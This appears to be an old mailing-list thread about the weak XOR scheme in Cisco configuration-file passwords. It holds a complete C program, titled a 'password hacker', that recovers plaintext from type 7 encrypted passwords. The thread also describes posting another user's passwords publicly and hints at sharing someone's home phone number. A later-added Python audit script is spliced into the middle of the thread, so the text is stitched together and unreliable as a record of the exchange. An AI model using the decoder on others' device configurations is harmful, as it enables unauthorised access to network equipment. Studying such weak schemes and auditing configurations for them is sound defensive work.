>You think you just did this guy a favor by posting his passwords to a
>public mailing list?
No, I probably did not do this particular guy a favor. I think I
did all the other guys (and females!) on this group a favor though. Do
not post your passwords here, even if they are encrypted. The encryption
system used for the configuration files is completely insecure, you don't
even need to brute-force the passwords, you can crack them in 'real-time'.
It uses a simple XOR system with a lousy 16-choice (00...15) random seed.
Anyone with a couple of free hours and an intermediate understanding of logic
theory could crack it, just given plaintext/encrypted password pairs, and
having no knowledge of the algorithm and no source code.
In fact, that's what we did.
>Can you tell me where you got the routine to decrypt passwords?
We reversed the algorithm and wrote our own routine, here it is:
---- w00 w00 ----
/* Cisco configuration file password hacker.
 * Algorithm discovered, and program written by:
 * gls and gfm[@gnu.ai.mit.edu]
 */
#include <stdio.h>
#include <string.h>

/* Fixed XOR key. The two-digit decimal prefix of the encrypted string
 * (00..15) is the starting offset into this table. */
int xor_table[] = { 0x64, 0x73, 0x66, 0x64,
                    0x3b, 0x6b, 0x66, 0x6f,
                    0x41, 0x2c, 0x2e, 0x69,
                    0x79, 0x65, 0x77, 0x72,
                    0x6b, 0x6c, 0x64, 0x4a,
                    0x4b, 0x44, 0x48, 0x53,
                    0x55, 0x42 };

int main(void)
{
    char password[32], cbyte[3], *cpt, text[16];
    int seed, len, x, hex, count = 0;
    int table_len = sizeof xor_table / sizeof xor_table[0];

    printf("Encrypted password: ");
    if (fgets(password, sizeof password, stdin) == NULL)
        return 1;
    if ((cpt = strchr(password, '\n')) != NULL)
        *cpt = '\0';
    /* First two characters are the seed, every following pair is one byte. */
    len = (strlen(password) / 2) - 1;
    if (len < 0 || sscanf(password, "%2d", &seed) != 1 || seed < 0 || seed > 15) {
        printf("Bad input: expected a two-digit seed followed by hex pairs\n");
        return 1;
    }
    printf("Decrypting: %s [Length: %d Seed: %02d]\n", password, len, seed);
    cbyte[2] = '\0';
    for (x = 2; password[x] && count < (int)sizeof text; x += 2) {
        cbyte[0] = password[x];
        cbyte[1] = password[x + 1];
        if (sscanf(cbyte, "%x", &hex) != 1)
            break;
        text[count++] = hex;
    }
    printf("Plaintext password: ");
    /* XOR each byte with the key byte at (seed + position); stop at the table end. */
    for (count = 0; count < len && count + seed < table_len; count++) {
        printf("%c", text[count] ^ xor_table[count + seed]);
    }
    printf("\n");
    return 0;
}
--- w00 w00 ---
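As an added defender-side example, not part of the original thread: a small audit script that walks a Cisco IOS-style configuration and flags every credential still stored as type 0 (cleartext) or type 7 (the reversible XOR scheme described above), as opposed to one-way types. The sample configuration and its hash values are constructed for the example and are not from a real device.

```python
import re

# Constructed Cisco IOS-style configuration fragment (not from a real device).
SAMPLE_CONFIG = """\
hostname edge-rtr
enable password 7 0822455D0A16
username admin password 0 letmein
username ops secret 5 $1$abcd$placeholderhashvalue
username sre secret 9 $9$placeholderscryptvalue
line vty 0 4
 password 7 104D000A0618
 login
"""

# Matches 'enable password', 'username X password', 'username X secret' and
# bare line 'password' statements; the numeric type may be omitted (= cleartext).
CRED_RE = re.compile(
    r"^\s*(?P<stmt>(?:enable|username\s+\S+)?\s*(?:password|secret))"
    r"\s+(?:(?P<type>\d+)\s+)?(?P<value>\S+)\s*$"
)

# How each IOS credential type stores the secret, from a defender's point of view.
TYPE_RISK = {
    "0": ("cleartext", "critical"),
    "7": ("reversible XOR obfuscation, decodable in real time", "critical"),
    "5": ("MD5-crypt, one-way but fast to brute-force", "medium"),
    "8": ("PBKDF2-SHA256, one-way", "ok"),
    "9": ("scrypt, one-way", "ok"),
}

def classify(type_code):
    """Map an IOS type code (None means no type given, i.e. cleartext) to (description, severity)."""
    if type_code is None:
        type_code = "0"
    return TYPE_RISK.get(type_code, ("unknown type", "review"))

def audit_config(config_text):
    """Return (line_no, statement, type, severity) for each credential line that is not one-way."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        m = CRED_RE.match(line)
        if not m:
            continue
        _desc, severity = classify(m.group("type"))
        if severity != "ok":
            findings.append((line_no, m.group("stmt").strip(), m.group("type") or "0", severity))
    return findings

if __name__ == "__main__":
    for line_no, stmt, type_code, severity in audit_config(SAMPLE_CONFIG):
        print(f"line {line_no}: '{stmt}' stored as type {type_code} ({classify(type_code)[0]}) -> {severity}")
```

Anything reported as critical should be treated exactly as a cleartext password: rotate it before the config is shared, and move to `secret` with a one-way type.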
>thanks
>Robert
>cisco eng
Thanks for asking.
I don't object to that, and pointing out that posting encrypted is not a
good idea; most people are aware that posting their etc/passwd file
will open their site to attack, so the method of the encryption is not
the only problem one faces.
But placing his plain text passwords on a public mail list is a poorly
thought out idea.
Now by way of example, by now you have gotten a private message with
your home phone number enclosed. This is something that you have not
protected to the public, but as anyone on alt.2600 could tell you,
maybe you should.
Sorry, I am annoyed at your anti-social behavior.
BTW George is correct, though.
Service encryption is meant to obscure your password, in case you must
look at your config file in the presence of others, but you should
really treat it like it is a plain text password.
Robert
******* Not representing cisco with this one. ********